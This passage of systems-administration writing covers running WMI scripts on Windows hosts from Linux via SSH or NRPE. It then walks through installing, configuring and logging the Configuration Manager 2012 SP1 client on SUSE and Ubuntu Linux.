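# Example run against a small sample log.
printf 'accept a\nreject b\nreject c\n' > /tmp/sample-mail.log
count_rejects /tmp/sample-mail.log   # prints: mail_rejects=2
```

The important part is the single, predictably formatted output line: whatever invokes the script (SSH, NRPE, a wrapper on the management station) only has to parse that.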
However, this model can also be slow, resource-intensive, and even risky, depending on how it is implemented. Simply put, it's expensive to spawn command processes, and twice as expensive to spawn them locally and remotely. It would be foolish to use this model when some other lighter option was available. On the other hand, if you need to perform a computationally- or I/O-intensive process in order to obtain the desired information (such as parsing through open log files, or gathering multiple pieces of data for comparison purposes) then it can often be faster and cheaper to execute the command on the remote host instead of issuing multiple discrete queries across the network and performing the calculations locally.
As for making this work, modern versions of Windows usually include most of the tools that are needed, although some assembly is often required, with greater amounts of work needed for progressively older versions of the operating system. For example, modern versions of Windows include the Windows Script Host interpreter and the character-based cscript.exe front-end, which together allow you to execute VBScript files from the command line. More recently, Windows PowerShell provides a directly accessible scriptable environment. Either of these tools can be used to query and even manipulate WMI objects, including WMI objects on other Windows hosts across a network.
There are also multiple options available for executing these scripts remotely. One option is to install an SSH server on the Windows host, and then run "ssh hostname remote-command" from the Linux console to execute the desired script, just like you would on UNIX systems. Windows systems with Subsystem for UNIX Applications (SUA)/Services for UNIX (SFU) can download premade SSH servers from Interop Systems. Alternatively, there are multiple SSH servers for Windows available that are based on Cygwin, if you prefer to use that environment.
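Concretely, the SSH approach looks something like the following sketch (the host name and script path are placeholders for illustration):

```shell
# Sketch: run a WMI-querying script on a Windows host over SSH.
# Host name and remote script path are placeholders for illustration.
WINHOST='winhost.example.com'
REMOTE_CMD='cscript //nologo C:\scripts\diskfree.vbs'

# The real invocation would be:
#   ssh "$WINHOST" "$REMOTE_CMD"
# Dry run: print the command that would be issued.
echo ssh "$WINHOST" "$REMOTE_CMD"
```

Whatever the script prints on the Windows side comes back on the SSH client's stdout, so the management station can consume it like any local command's output.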
As another option, the Nagios management platform provides a remote-command interface called NRPE that is essentially a client-server protocol for executing predefined commands. In this model, target systems are set up as NRPE servers, while the management station runs an NRPE client. Commands are defined in a configuration file at each server, and the client connects to the server and instructs it to execute one of those commands, with any additional parameters being supplied in the request. If the command is known to the server, it executes the request, returns the response data, and then closes the connection. NRPE is simpler to set up than SSH, and it is also arguably more secure given that the server cannot run arbitrary programs. There is also a prebuilt NRPE server for Windows available.
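As a rough sketch of the NRPE model (the command name and script path below are invented for illustration; check your NRPE server's documentation for the exact file and syntax), the server-side definition and the matching client call look something like:

```
# On the target host, the NRPE configuration file defines the only
# commands the server is permitted to run, each under a short name:
command[get_diskfree]=C:\scripts\diskfree.bat

# On the Linux management station, the client asks for it by name:
#   check_nrpe -H winhost.example.com -c get_diskfree
```

Because the client can only name a predefined command, a compromised management station cannot use NRPE to run arbitrary programs on the target, which is the basis of the security argument above.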
Naturally, the ramifications for this class of technology can be immense. On the security front, their whole raison d'être is to facilitate remote command-level access to your Windows servers, which frankly should be enough to give anyone pause. As for deployment, these tools require additional software or scripts on the Windows hosts, but since the scripting tools can perform WMI queries over the network you really only need the executables to be installed on one specific server, which can then act as a proxy for all of the other Windows hosts that it has access to (this will require that the scripts have a hostname argument, obviously). Some software may also be required on the Linux management station, such as the NRPE client, or wrapper scripts that call the preferred tool and dispose of the response data.
Administrators who are interested in pursuing remote-command execution techniques should study some of the scripts hosted on monitoringexchange.org, which includes a variety of VBScript files for extracting data from WMI. Some of these scripts can be useful for some of the other technologies mentioned earlier as well.
At the time of writing, Configuration Manager 2012 Service Pack 1 offers client support for the following UNIX and Linux distributions:
- Red Hat Enterprise Linux
  - Version 4, 5, 6 (x86 and x64)
- Solaris
  - Version 9 (SPARC)
  - Version 10 (x86 and SPARC)
- SUSE Linux Enterprise Server
  - Version 9 (x86)
  - Version 10 SP1 (x86 and x64)
  - Version 11 (x86 and x64)
In the near future the number of distributions supported will increase, putting Configuration Manager’s UNIX and Linux support in line with System Center Operations Manager. It is also worth pointing out that the support for UNIX and Linux distributions is targeted to the server distributions rather than the client distributions.
The UNIX/Linux client is fairly lightweight in comparison to its Windows (or even Mac) counterparts, with the following natively supported features:
- Hardware inventory
- Inventory of installed software
- Software distribution
No Configuration Manager 2012 infrastructure changes are required to support UNIX/Linux clients, and additionally, as Configuration Manager 2012 sees the UNIX/Linux clients as just another client, the reports you are using today for your Windows based clients are the same that you use for the UNIX/Linux clients.
Each UNIX/Linux distribution has its own set of client installation files which can be downloaded from our download centre, as UNIX/Linux versions can have different characteristics that we need to interact with (note the orange layer in the diagram below).
You’ll also note that we are installing a CIM server called OMI (originally NanoWBEM, open-sourced by Microsoft through The Open Group: http://www.opengroup.org/software/omi) along with the client itself to provide the WMI-like functionality we are used to with a Windows client. One thing to be aware of is that the CIM server we are installing with the Configuration Manager 2012 SP1 client is different from the CIM server that the System Center Operations Manager client installs.
The UNIX/Linux client talks back to the Configuration Manager 2012 SP1 infrastructure over HTTP or HTTPS. Content downloads are also performed over the same protocol (so there is no SMB client requirement on your UNIX/Linux server), but as the UNIX/Linux clients are treated as workgroup clients you need to ensure the network access account is configured. The UNIX/Linux client will then use the network access account to authenticate with the distribution point when downloading content.
Why do I care as a ConfigMgr administrator?
A simple answer to the ‘Why do I care’ question is – you own ConfigMgr and, as a ConfigMgr administrator, you have extensive experience managing Windows systems, so why not extend that capability to managing UNIX and Linux systems? In the current IT environments that exist in most organizations today, being able to show additional value with existing resources can only be a good thing! One question that may be on your mind is whether you have to learn UNIX and Linux to effectively manage those systems through ConfigMgr. There will be some learning required, but in no way do you need to be a full UNIX or Linux administrator to effectively leverage ConfigMgr to manage these systems. After all, the management concepts are similar – the only real difference is implementing the management. Let me say at the outset that I in no way consider myself an expert – or even proficient – at UNIX and Linux administration – but I am very proficient at ConfigMgr, so with the ConfigMgr client I am able to make UNIX and Linux sing! As you will soon see, the ConfigMgr client on a UNIX or Linux system is little different from the ConfigMgr client on a Windows system. The biggest hurdle is getting familiar enough with the UNIX or Linux system to know how to operate effectively. I’ll try to help you with that with a few hints below.
Another reason you may care to manage UNIX and Linux systems is the unified view this brings to the systems in your environment. Now you can deliver metrics not only on your Windows systems but on UNIX and Linux as well!
The Unix and Linux client
The UNIX and Linux client is not distributed with the ConfigMgr 2012 SP1 or even the cumulative update 2 source. The client can be downloaded from http://www.microsoft.com/en-us/download/details.aspx?id=36212. The screenshot below shows the UNIX and Linux files all downloaded into the same directory.
Notice that there are separate files for some of the supported UNIX and Linux versions, but not all supported platforms have their own unique installation files. Why? Good question. The answer is found in the last couple of files, called the Universal installer. The Universal installer supports installing the ConfigMgr client on all supported Linux platforms – for the UNIX platforms you should continue using the unique files for each distribution. In the list of files you see specific files for some Linux distributions – such as SLES and Red Hat. These files are the original release of the ConfigMgr client and not the updated one provided by the Universal client installation.
Working with UNIX and Linux
As already stated, I by no means consider myself a UNIX or Linux guru. In fact, working with UNIX and Linux was quite interesting for me. It’s quite unusual for me to sit in front of a computer and be totally lost! :) If you are new to UNIX and Linux, you likely will find yourself feeling exactly that way! Let me try to help.
In my lab I run UNIX and Linux systems as Hyper-V virtual machines – and that was the first problem. When I loaded up my first Linux environment my natural tendency was to grab the mouse to try and get things configured. Alas, the mouse didn’t work. I quickly became frustrated because I couldn’t figure out how to navigate with keyboard to even get into a terminal window. Add to this that I didn’t have any network access because the Linux distribution I chose didn’t support the Hyper-V integration components! Argghhhh. Never a quitter I struck out with my trusty Bing search skills and quickly found my way. A summary of those tips below.
1. If you choose a distribution that does not have native support for the Hyper-V integration components you can add them by downloading and installing them to Linux manually. The files and instructions can be found at the links below.
http://www.microsoft.com/en-us/download/details.aspx?id=11674 (Windows 2008 R2 Hyper-V Integration Components)
http://social.technet.microsoft.com/Forums/windowsserver/en-US/0d2c5fa8-682c-4f5d-9fe7-388dd80a7e06/simplified-instructions-for-installing-the-linux-integration-components-into-hyperv-virtual (a nice write up on how to install mouse drivers into a Linux distribution)
NOTE: If you let a native UNIX or Linux person see you using a mouse they will laugh at you! :)
2. If your distribution doesn’t support the native integration components for Hyper-V then likely networking won’t work. You can generally get around this by leveraging a Hyper-V legacy NIC.
3. On SUSE Linux, YaST is a fantastic utility for configuring the NIC – as you will see below. Other distributions have their own tools, and the generic ones generally work as well. ifconfig is another tool useful for configuring the network – more on that one below as well. Persisting ifconfig settings requires editing the interfaces file as described in http://www.ubuntugeek.com/ubuntu-networking-configuration-using-command-line.html.
4. Putty is your friend! Just like you want to remotely manage Windows systems, you want to do the same with UNIX and Linux systems. Putty allows you to remotely connect to a UNIX or Linux system but only from a command line. Putty is available at http://www.putty.org/
5. WinSCP makes Windows admins feel at home. One of the biggest challenges I faced was figuring out how to connect my UNIX or Linux system to my Windows environment to copy and manipulate files. The instructions for setting up the client will give you some insight on how to do that, but when it comes to browsing the system to view log files, understanding the client installation location and more, I found it quite handy to have a tool like WinSCP that allows seamlessly moving files between a Windows and UNIX or Linux environment. WinSCP is available at http://winscp.net/eng/index.php.
6. Text editor – vi – get used to it if you are editing on the Linux console. WinSCP will help, but unless you are running as root you must use ‘sudo’ (as you will see soon) to save info in some cases – and it’s just easier to use vi. A good shortcut doc to get you started navigating vi is http://linuxservertutorials.blogspot.com/2008/11/ubuntu-command-line-text-editor.html.
The best way to understand how to use these tools to navigate UNIX or Linux is to see it in action – so let’s start from the beginning. In my lab I have two virtual machines – one running SUSE Enterprise Linux and the other running Ubuntu 12.04. The first step with these VMs is to confirm they are up and running on the network. If you are running in a VM and your distribution doesn’t recognize the native NIC (such as when running in a Hyper-V environment with a distribution that does not have the integration components included), then you may need to use a legacy NIC in order to configure networking.
Let’s start by working through configuring network access for my SUSE Enterprise Linux client. Note that in my lab with the SUSE Enterprise Linux client I am logging on with root – which makes things a bit easier to configure but is also less secure. For the Ubuntu 12.04 system I’ll show configuration running as a non-root account.
With SUSE Enterprise Linux installed, login as root.
To configure networking (and many other things) in SUSE Linux, YaST is a fantastic tool! There is a GUI-based version of YaST and a command line version. Since we are aspiring to be expert UNIX and Linux administrators, we will go with the command line version! :) It’s also really easy to use in command line form, which helps. Launch YaST from the command line by typing ‘yast’ and navigate to configure the network as shown in the next few slides. NOTE: Navigating YaST is easily done with <tab> and <shift><tab>.
Select Network Devices > Network Card
Make sure you use the Traditional method of setup – the other will seem to work but fail when committing changes if you don’t have the required components installed in your setup.
In this case I have two Network Cards – one that is the default but that doesn’t work for me in this setup since I don’t have the Hyper-V integration components – the other was added when I added the Legacy Hyper-V NIC.
To configure the NIC simply navigate to Edit on the NIC you want to configure and fill in the details for the options. The IP address and subnet mask, along with the hostname and DNS information will be most common. Once done, commit your changes and test to ensure you can ping another system on your network.
So now the network is configured in SUSE Linux using YaST. With this done most likely you don’t need to keep the VM up and running any longer – we will connect to it with a couple of extra tools shortly. Now, let’s configure the network on the Ubuntu 12.04 system.
For the Ubuntu system I will login as a non-root account.
YaST does not exist on Ubuntu so instead we will use a more traditional means of configuring the network. This approach should work on most, if not all, Linux distributions.
To get the network configured for one-time use we can use ifconfig from the command line as shown.
Interesting! Notice the permission denied messages! Remember what I mentioned about logging in with a non-root account? That’s why I don’t have permissions to make this change. I can fix this quite easily by simply adding the ‘sudo’ command at the beginning of the command line.
And that’s it – network is configured as we see by the fact the system is now able to ping other devices on the network.
OK, so you're actually not quite done. As long as you leave this session up and running, all is good. If you reboot, though, the network config is lost. So how do you configure the system to persist your network configuration? It’s actually not that hard, but it will require that we leverage a text editor and also launch that text editor with administrative permissions. I’ll also use this as an opportunity to explain the config a bit more.
The configuration file we need to modify is /etc/network/interfaces. By opening this file you can view the config but won’t be able to save it unless your editor is launched using sudo. The most ubiquitous text editor on Linux is vi, so we can launch vi and edit our file as follows.
I’ll select to Edit anyway and we get the file. In my case the configuration has already been added. A couple of things to note here. First, there are additional options for the network config vs. what I showed in the initial example. Second, there are very likely multiple interfaces on the system. You will need to reference and config each one appropriately. The tag, such as eth0, eth2, lo, will identify the config for each specific adapter.
NOTE: I find using vi to be utterly and unnecessarily confusing, but once you get accustomed to the basic editing functions, it’s actually not that bad. The key is whether you are in command or authoring mode. Though not exhaustive, the documentation at http://linuxservertutorials.blogspot.com/2008/11/ubuntu-command-line-text-editor.html is a great help and should be enough to get you to where you can edit and save the configurations you need in this file.
Edit the file as needed – the documentation at http://www.ubuntugeek.com/ubuntu-networking-configuration-using-command-line.html is helpful for this. After you save, if you want to ensure the network adapter configuration information is persisted, reboot and then run the configuration tool to validate, as shown.
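For reference, a minimal static-address stanza in /etc/network/interfaces follows this shape (the addresses below are examples only; substitute your own):

```
# /etc/network/interfaces -- example static configuration for eth0.
# Addresses are illustrative; use values appropriate for your network.
auto eth0
iface eth0 inet static
    address 192.168.1.50
    netmask 255.255.255.0
    gateway 192.168.1.1
```

Each interface on the system (eth0, eth1, lo, and so on) gets its own stanza of this form.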
OK, NOW you are all done with network configuration. Fun, huh? If we have full network connectivity to our VMs, then at this point there should be no need to maintain an open connection to them. I have closed my two sessions and will use two other tools to remotely manage my machines – Putty and WinSCP. I find both indispensable – for different reasons. We will use Putty now, and WinSCP will come into focus when we begin discussing the client install.
Much like an RDP session in the Windows world, Putty allows a remote connection to the command line of Linux machines. I will launch Putty and connect to as many systems as I need. From this point forward I will just use one of my VMs, because the steps are identical for whatever UNIX or Linux distribution you may be using.
After I specify the connection information I get connected to the remote system, supply my credentials and I’m in – just as if I were connected to the system locally.
Finally we are at the place where we can begin the client installation. As mentioned earlier, the universal client is the one we want to install on any supported Linux distribution. It has the latest code base and applies across all supported platforms, even when a named installer also exists (shown previously).
There is excellent step-by-step documentation for installing the ConfigMgr UNIX and Linux client. The process is to create a temporary directory, mount the client files from a remote Windows share, change the install mode so installation is allowed, install the client and then cleanup/explore. We will go through these steps here as well but I’ll also use this process to introduce WinSCP.
The first thing to do is create the temporary folder to hold our client files.
With the temporary directory made, the next step would be to mount the client files from a remote Windows share using the command line below.
mount -t cifs -o username=<User Name>,password=<password> //<Windows computer Name>/<Client File Share> /tmp/CCMClient
This works, but I see this as a great opportunity to introduce WinSCP, an Explorer-like utility that is perfect for moving files between Windows systems and UNIX or Linux. So let’s use WinSCP to move the client files into the temporary directory. WinSCP is available at http://www.winscp.net.
Launch WinSCP and supply your connection details and credentials.
The connection establishes and opens into an explorer like view. The view here may be different depending on the options chosen during setup.
We will copy our installation files to the /tmp/CCMClient folder using copy & paste.
So the files are now copied and we are ready to continue with the install. This was just a simple look at WinSCP, but you hopefully already see how convenient it is. You can use WinSCP to edit text files, copy the ConfigMgr log file from the UNIX or Linux system to the Windows system to view with CMTrace, and more.
With the files copied we will execute the command lines that will ready the Linux system to allow the install and then to perform the client install.
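The shape of those command lines is roughly the following sketch (the management point name, site code, and installer file name are placeholders for illustration; check the installation documentation for your exact build):

```shell
# Sketch of the client install steps. Server name (cm01.contoso.com),
# site code (PS1) and installer file name are placeholders only.
mkdir -p /tmp/CCMClient && cd /tmp/CCMClient
touch install ccm-Universalx64.tar   # stand-ins for the copied files
chmod +x install                     # allow the install script to run

# The real install command would then be something like:
#   ./install -mp cm01.contoso.com -sitecode PS1 ccm-Universalx64.tar
ls -l install
```

The chmod step is the "ready the system to allow the install" part; without it the install script downloaded from Windows will not be executable.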
The client install completes – notice the highlighted parts. So what exactly is OMI? OMI is the UNIX and Linux equivalent of the WMI that Windows administrators will already find familiar. Just like the Windows ConfigMgr client, the UNIX and Linux client makes use of WMI/OMI for storing client information and retrieving hardware inventory. We will see this shortly.
So that’s it. The client is installed. If the client is able to communicate properly we will see it show up in the ConfigMgr 2012 SP1 console under devices. Depending on configuration you may need to approve the client. Once hardware inventory completes you will be able to see that reflected in resource explorer for the client, as shown.
If you want to practice with software distribution, that is done via packages. I build a test package using the OpsMgr UNIX or Linux agent.
Just like the Windows client, all of the activity on the UNIX or Linux client can be tracked in the log file. Different from the Windows client, all of the functions of the UNIX or Linux client are combined in a single log. Also, UNIX and Linux clients default to only show ‘Warning’ log entries. This is a different experience from the Windows client, and I’ve seen many questions raised on how to read the log and interpret its meaning. The answer is simple – add more verbosity to the log and it will then read very similarly to a Windows client log file.
There are four levels of logging available – error, warning (default), info and trace. Trace is the most verbose level of logging you can have. Like verbose and debug logging, trace logging on a UNIX or Linux system is listed as something that should only be used for troubleshooting. To me, the extra level of logging provided by verbose/debug and trace makes it sufficiently valuable that I leave it on all the time – so if there is a problem I hopefully won’t need to go back and enable logging and again reproduce the issue. Each person will need to decide this for themselves. The most common argument for disabling verbose/debug or trace level logging is to prevent putting extra load on the system. For any modern device the extra load imposed by additional logging will not even be noticeable and provides great value.
To change the log level we will leverage WinSCP again and open the scxcm.conf file at /opt/microsoft/configmgr/etc/
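The entry to edit looks roughly like the following (this is the format as I understand it – verify against your installed scxcm.conf before editing, as it may differ between client versions). Changing the module level from WARNING to TRACE gives the most verbose output:

```
# Example scxcm.conf entry (verify against your installed file).
# MODULE level TRACE is the most verbose; WARNING is the default.
FILE (
  PATH: /var/opt/microsoft/scxcm.log
  MODULE: TRACE
)
```

After saving the change, restart the client (shown next) for the new log level to take effect.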
With this level of logging in place we will restart the client and then take a look at the log. The commands to restart and interact with the client to trigger a policy or hardware inventory cycle are below.
Start, Stop, Restart
/etc/init.d/ccmexecd start
/etc/init.d/ccmexecd stop
/etc/init.d/ccmexecd restart
Trigger Client Actions
/opt/microsoft/configmgr/bin/ccmexec -rs policy
/opt/microsoft/configmgr/bin/ccmexec -rs hinv
To take a look at the log file generated in CMTrace we use WinSCP to move the log file to our Windows system and then open in CMTrace.
OK, so one last thing to discuss. I mentioned earlier that the UNIX and Linux client makes use of OMI, which is a WMI equivalent for UNIX and Linux. The beauty of this is that it allows ConfigMgr administrators who are already familiar with WMI to apply those skills to the UNIX and Linux client. If we take a look at the ConfigMgr client install folder with WinSCP we will see some familiar territory. Note the highlighted area. If you have spent any time in WMI on a Windows client you will recognize these as WMI namespaces. The ccm and invagt namespaces are ConfigMgr-specific, and the CIMV2 namespace is a system namespace ConfigMgr leverages for pulling inventory.
If we look in the cimv2 namespace we see familiar classes. Not all the classes we would see on a Windows machine – not by a long stretch – but familiar ones nonetheless – and the information in these classes is what we will collect with hardware inventory and what you will see in the console.
If we open a couple of these we will see the data that resides in each. Note that not every potential entry contains a value – same as when viewing this information on a Windows client.
And one more…
And that’s it – that’s the UNIX and Linux client – definitely worth taking a look at, and hopefully this helps you along the process. One last thing to mention. As already pointed out, the UNIX and Linux clients come as separate downloads. They are not part of the ConfigMgr 2012 media and, accordingly, there is no inbuilt mechanism to install the UNIX or Linux client. It’s really up to you to decide how best to do so – script, manually, whatever. Wouldn’t it be cool if we could do the install very similar to the way we are able to push the client with ConfigMgr? Hmmm…well, glad you think so. One of my colleagues, Neil Peterson, has put together a blog post on using System Center Orchestrator to do just that. The blog post is available at http://blogs.technet.com/b/neilp/archive/2012/10/17/system-center-2012-automating-configuration-manager-client-deployment-to-linux-systems.aspx. If you haven’t started looking at Orchestrator to automate your routine IT processes, you should. Orchestrator is very familiar territory for those familiar with task sequencing and something that should be in the back pocket of every ConfigMgr administrator!
What’s on your mind? Talk back to me by leaving a comment below.